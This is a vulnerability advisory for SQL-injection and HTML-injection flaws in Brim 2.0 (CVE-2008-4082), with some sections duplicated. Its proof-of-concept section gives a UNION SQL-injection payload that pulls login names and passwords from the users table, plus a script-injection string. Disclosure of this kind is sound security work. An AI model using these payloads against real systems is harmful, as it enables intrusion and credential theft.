Brim SQL Injection and HTML Injection Vulnerabilities
BID:30944
Info
Brim SQL Injection and HTML Injection Vulnerabilities
| Bugtraq ID: | 30944 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-4082 |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 30 2008 12:00AM |
| Updated: | May 07 2015 05:24PM |
| Credit: | InjEctOr5 |
| Vulnerable: |
Brim Brim 2.0 |
| Not Vulnerable: | |
Discussion
Brim SQL Injection and HTML Injection Vulnerabilities
Brim is prone to multiple input-validation vulnerabilities, including multiple SQL-injection issues and an HTML-injection issue.
Attackers can exploit these issues to steal cookie-based authentication credentials from legitimate users of the site, modify the way the site is rendered, access or modify data, or exploit latent vulnerabilities in the underlying database.
Brim 2.0.0 is vulnerable; other versions may also be affected.
Brim is prone to multiple input-validation vulnerabilities, including multiple SQL-injection issues and an HTML-injection issue.
Attackers can exploit these issues to steal cookie-based authentication credentials from legitimate users of the site, modify the way the site is rendered, access or modify data, or exploit latent vulnerabilities in the underlying database.
Brim 2.0.0 is vulnerable; other versions may also be affected.
Exploit / POC
Brim SQL Injection and HTML Injection Vulnerabilities
Attackers can exploit these issues via a browser.
The following examples are available:
To demonstrate the SQL-injection vulnerability, insert the following into any field on the search page:
' union select 1,2,3,4,concat(loginname,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17 from brim_users/*
To demonstrate the HTML-injection vulnerability, add the following as the name for an action within the bookmark plugin:
>"><script>alert("InjEctOr Team5")</script>
Attackers can exploit these issues via a browser.
The following examples are available:
To demonstrate the SQL-injection vulnerability, insert the following into any field on the search page:
' union select 1,2,3,4,concat(loginname,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17 from brim_users/*
To demonstrate the HTML-injection vulnerability, add the following as the name for an action within the bookmark plugin:
>"><script>alert("InjEctOr Team5")</script>
Solution / Fix
Brim SQL Injection and HTML Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Brim SQL Injection and HTML Injection Vulnerabilities
References:
References:
- Brim Homepage (Brim)
- Brim Project Homepage (Brim)